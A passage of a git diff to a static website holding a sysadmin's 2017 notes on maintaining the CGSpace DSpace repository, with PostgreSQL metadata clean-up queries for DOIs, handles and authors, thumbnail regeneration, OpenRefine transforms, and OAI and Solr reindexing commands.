  • The climate risk management one doesn’t exist, so I will have to ask Magdalena if they want me to add it to the input forms
  • Start testing some nearly 500 author corrections that CCAFS sent me:
  • -
    $ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
    +
    $ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
     

    2017-02-09

    • More work on CCAFS Phase II stuff
    • @@ -219,51 +219,50 @@ DELETE 1
    • And then a SQL command to update existing records:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
     UPDATE 58193
     
    • Seems to work fine!
    • I noticed a few items that have incorrect DOI links (dc.identifier.doi), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:
    -
    dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
    +
    dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
     
    • This will replace any that begin with 10. and change them to https://dx.doi.org/10.:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
     
    • This will get any that begin with doi:10. and change them to https://dx.doi.org/10.x:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
     
    • Fix DOIs like dx.doi.org/10. to be https://dx.doi.org/10.:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
     
    • Fix DOIs like http//:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
     
    • Fix DOIs like dx.doi.org./:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
    -
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
     
    • Delete some invalid DOIs:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
     
    • Fix some other random outliers:
    -
    dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
    +
    dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
     
    • And do another round of http:// → https:// cleanups:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
     
    • Run all DOI corrections on CGSpace
    • Something to think about here is to write a Curation Task in Java to do these sanity checks / corrections every night
    • @@ -282,10 +281,10 @@ dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agro
    $ python
     Python 3.6.0 (default, Dec 25 2016, 17:30:53)
    ->>> print('Entwicklung & Ländlicher Raum')
    +>>> print('Entwicklung & Ländlicher Raum')
     Entwicklung & Ländlicher Raum
    ->>> print('Entwicklung & Ländlicher Raum'.encode())
    -b'Entwicklung & L\xc3\xa4ndlicher Raum'
    +>>> print('Entwicklung & Ländlicher Raum'.encode())
    +b'Entwicklung & L\xc3\xa4ndlicher Raum'
     
    • So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really was a temporary problem, perhaps due to macOS or the Python build I was using.
    @@ -294,11 +293,11 @@ b'Entwicklung & L\xc3\xa4ndlicher Raum'
  • Testing regenerating PDF thumbnails, like I started in 2016-11
  • It seems there is a bug in filter-media that causes it to process formats that aren’t part of its configuration:
  • -
    $ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p "ImageMagick PDF Thumbnail"
    +
    $ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p "ImageMagick PDF Thumbnail"
     File: earlywinproposal_esa_postharvest.pdf.jpg
    -FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
    +FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
     File: postHarvest.jpg.jpg
    -FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
    +FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
     
    • According to dspace.cfg the ImageMagick PDF Thumbnail plugin should only process PDFs:
    @@ -317,8 +316,8 @@ filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = A
    • Find all fields with “http://hdl.handle.net” values (most are in dc.identifier.uri, but some are in other URL-related fields like cg.link.reference, cg.identifier.dataurl, and cg.identifier.url):
    -
    dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
    +
    dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
     UPDATE 58633
     
    • This works but I’m thinking I’ll wait on the replacement as there are perhaps some other places that rely on http://hdl.handle.net (grep the code, it’s scary how many things are hard coded)
    • @@ -345,7 +344,7 @@ Certificate chain
    • For some reason it is now signed by a private certificate authority
    • This error seems to have started on 2017-02-25:
    -
    $ grep -c "unable to find valid certification path" [dspace]/log/dspace.log.2017-02-*
    +
    $ grep -c "unable to find valid certification path" [dspace]/log/dspace.log.2017-02-*
     [dspace]/log/dspace.log.2017-02-01:0
     [dspace]/log/dspace.log.2017-02-02:0
     [dspace]/log/dspace.log.2017-02-03:0
    @@ -381,7 +380,7 @@ Certificate chain
     
  • The problem likely lies in the logic of ImageMagickThumbnailFilter.java, as ImageMagickPdfThumbnailFilter.java extends it
  • Run CIAT corrections on CGSpace
  • -
    dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
    +
    dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
     
    • CGNET has fixed the certificate chain on their LDAP server
    • Redeploy CGSpace and DSpace Test to on latest 5_x-prod branch with fixes for LDAP bind user
    • @@ -393,12 +392,12 @@ Certificate chain
    • Ah, this is probably because some items have the International Center for Tropical Agriculture author twice, which I first noticed in 2016-12 but couldn’t figure out how to fix
    • I think I can do it by first exporting all metadatavalues that have the author International Center for Tropical Agriculture
    -
    dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
    +
    dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
     COPY 1968
     
    • And then use awk to print the duplicate lines to a separate file:
    -
    $ awk -F',' 'seen[$1]++' /tmp/ciat.csv > /tmp/ciat-dupes.csv
    +
    $ awk -F',' 'seen[$1]++' /tmp/ciat.csv > /tmp/ciat-dupes.csv
     
    • From that file I can create a list of 279 deletes and put them in a batch script like:
    diff --git a/docs/2017-03/index.html b/docs/2017-03/index.html index e22ece9c3..8d8956f40 100644 --- a/docs/2017-03/index.html +++ b/docs/2017-03/index.html @@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x’s thumbnails were sRGB, but forcing reg $ identify ~/Desktop/alc_contrastes_desafios.jpg /Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000 "/> - + @@ -180,9 +180,9 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
  • Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)
  • This is trivial with identify (even by the Java ImageMagick API):
  • -
    $ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
    +
    $ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
     DirectClass CMYK
    -$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
    +$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
     DirectClass sRGB Alpha
     

    2017-03-04

      @@ -196,7 +196,7 @@ DirectClass sRGB Alpha
    • They want something like the items that are returned by the general “LAND” query in the search interface, but we cannot do that
    • We can only return specific results for metadata fields, like:
    -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "LAND REFORM", "language": null}' | json_pp
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "LAND REFORM", "language": null}' | json_pp
     
    • But there are hundreds of combinations of fields and values (like dc.subject and all the center subjects), and we can’t use wildcards in REST!
    • Reading about enabling multiple handle prefixes in DSpace
    • @@ -212,11 +212,11 @@ DirectClass sRGB Alpha
    • Because of this I noticed that our Handle server’s config.dct was potentially misconfigured!
    • We had some default values still present:
    -
    "300:0.NA/YOUR_NAMING_AUTHORITY"
    +
    "300:0.NA/YOUR_NAMING_AUTHORITY"
     
    • I’ve changed them to the following and restarted the handle server:
    -
    "300:0.NA/10568"
    +
    "300:0.NA/10568"
     
    • In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk
    • From dspace/config/crosswalks/google-metadata.properties:
    • @@ -225,10 +225,10 @@ DirectClass sRGB Alpha
    • This works, and makes DSpace output the following metadata on the item view page:
    -
    <meta content="https://dx.doi.org/10.1186/s13059-017-1153-y" name="citation_doi">
    +
    <meta content="https://dx.doi.org/10.1186/s13059-017-1153-y" name="citation_doi">
     

    2017-03-06

    @@ -260,7 +260,7 @@ DirectClass sRGB Alpha
    • Export list of sponsors so Peter can clean it up:
    -
    dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
    +
    dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
     COPY 285
     

    2017-03-12

      @@ -271,7 +271,7 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
    • Generate a new list of unique sponsors so we can update the controlled vocabulary:
    -
    dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
    +
    dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
     
    • Pull request for controlled vocabulary if Peter approves: https://github.com/ilri/DSpace/pull/308
    • Review Sisay’s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: https://github.com/ilri/DSpace/pull/307
    • @@ -325,11 +325,11 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
      • Dump a list of fields in the DC and CG schemas to compare with CG Core:
      -
      dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
      +
      dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
       
      • Ooh, a better one!
      -
      dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
      +
      dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
       

      2017-03-30

      • Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150–190%, so this should make the alerts less regular
      • diff --git a/docs/2017-04/index.html b/docs/2017-04/index.html index 8ffbd5da9..8ab981a25 100644 --- a/docs/2017-04/index.html +++ b/docs/2017-04/index.html @@ -17,7 +17,7 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i Remove redundant/duplicate text in the DSpace submission license Testing the CMYK patch on a collection with 650 items: -$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt +$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt " /> @@ -38,9 +38,9 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i Remove redundant/duplicate text in the DSpace submission license Testing the CMYK patch on a collection with 650 items: -$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt +$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt "/> - + @@ -136,12 +136,12 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Th
      • Remove redundant/duplicate text in the DSpace submission license
      • Testing the CMYK patch on a collection with 650 items:
      -
      $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
      +
      $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
       

      2017-04-03

      • Continue testing the CMYK patch on more communities:
      -
      $ [dspace]/bin/dspace filter-media -f -i 10568/1 -p "ImageMagick PDF Thumbnail" -v >> /tmp/filter-media-cmyk.txt 2>&1
      +
      $ [dspace]/bin/dspace filter-media -f -i 10568/1 -p "ImageMagick PDF Thumbnail" -v >> /tmp/filter-media-cmyk.txt 2>&1
       
      • So far there are almost 500:
      @@ -174,17 +174,17 @@ ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0
      • This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a “checksum” (ie, there was a bitstream in the submission):
      -
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
      +
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
       
      • Then this one does the same, but for fields that don’t contain checksums (ie, there was no bitstream in the submission):
      -
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
      +
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
       
      • For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.
      • It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled…
      • In that case it might just be better to see how many the user submitted (both with and without bitstreams):
      -
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
      +
      dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
       

      2017-04-05

      • After doing a few more large communities it seems this is the final count of CMYK PDFs:
      • @@ -273,7 +273,7 @@ OAI 2.0 manager action ended. It took 829 seconds.
      • The import command should theoretically catch situations like this where an item’s metadata was updated, but in this case we changed the metadata schema and it doesn’t seem to catch it (could be a bug!)
      • Attempting a full rebuild of OAI on CGSpace:
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
       $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
       ...
       58700 items imported so far...
      @@ -326,8 +326,8 @@ sys     1m29.310s
       
    • One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see harvester.autoStart in dspace/config/modules/oai.cfg)
    • Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(435) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(435) is still referenced from table "bundle".
     

    2017-04-18

    • I used Ansible to create a PostgreSQL user that only has SELECT privileges on the tables it needs:
    -
    $ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
    +
    $ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
     
    • Need to look into running this via systemd
    • This is interesting for creating runnable commands from bundle:
    • @@ -360,15 +360,15 @@ $ rails -s
    • Looking at 933 CIAT records from Sisay, he’s having problems creating a SAF bundle to import to DSpace Test
    • I started by looking at his CSV in OpenRefine, and I see there a bunch of fields with whitespace issues that I cleaned up:
    -
    value.replace(" ||","||").replace("|| ","||").replace(" || ","||")
    +
    value.replace(" ||","||").replace("|| ","||").replace(" || ","||")
     
    • Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:
    -
    unescape(value,"url")
    +
    unescape(value,"url")
     
    • Then create the filename column using the following transform from URL:
    -
    value.split('/')[-1].replace(/#.*$/,"")
    +
    value.split('/')[-1].replace(/#.*$/,"")
     
    • The replace part is because some URLs have an anchor like #page=14 which we obviously don’t want on the filename
    • Also, we need to only use the PDF on the item corresponding with page 1, so we don’t end up with literally hundreds of duplicate PDFs
    • @@ -381,7 +381,7 @@ $ rails -s
    • Looking at the CIAT data again, a bunch of items have metadata values ending in ||, which might cause blank fields to be added at import time
    • Cleaning them up with OpenRefine:
    -
    value.replace(/\|\|$/,"")
    +
    value.replace(/\|\|$/,"")
     
    • Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle
    • I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items
    • @@ -395,7 +395,7 @@ $ rails -s
    • Add a description to the file names using:
    -
    value + "__description:" + cells["dc.type"].value
    +
    value + "__description:" + cells["dc.type"].value
     
    • Test import of 933 records:
    @@ -409,8 +409,8 @@ $ wc -l /tmp/ciat
  • More work on Ansible infrastructure stuff for Tsega’s CKM DSpace REST API
  • I’m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    -$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
     

    2017-04-22

    • Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the cleanup task
    • @@ -447,7 +447,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
    • Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:
    -
    # grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
    +
    # grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
     [dspace]/log/dspace.log.2017-04-01:0
     [dspace]/log/dspace.log.2017-04-02:0
     [dspace]/log/dspace.log.2017-04-03:0
    diff --git a/docs/2017-05/index.html b/docs/2017-05/index.html
    index e5851031a..80fcc9b69 100644
    --- a/docs/2017-05/index.html
    +++ b/docs/2017-05/index.html
    @@ -18,7 +18,7 @@
     
     
     
    -
    +
     
     
         
    @@ -159,7 +159,7 @@
     
  • This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using dspace cleanup -v, or else you’ll run out of disk space
  • In the end I realized it’s better to use submission mode (-s) to ingest the community object as a single AIP without its children, followed by each of the collections:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit"
     $ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
     $ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
     $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
    @@ -184,13 +184,13 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
     
  • The CGIAR Library metadata has some blank metadata values, which leads to ||| in the Discovery facets
  • Clean these up in the database using:
  • -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     
    • I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up
    • Hours into the re-ingestion I ran into more errors, and had to erase everything and start over again!
    • Now, no matter what I do I keep getting foreign key errors…
    -
    Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"
    +
    Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"
       Detail: Key (handle_id)=(80928) already exists.
     
    • I think those errors actually come from me running the update-sequences.sql script while Tomcat/DSpace are running
    • @@ -202,7 +202,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
    • I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields
    • Finally finished importing all the CGIAR Library content, final method was:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit"
    +
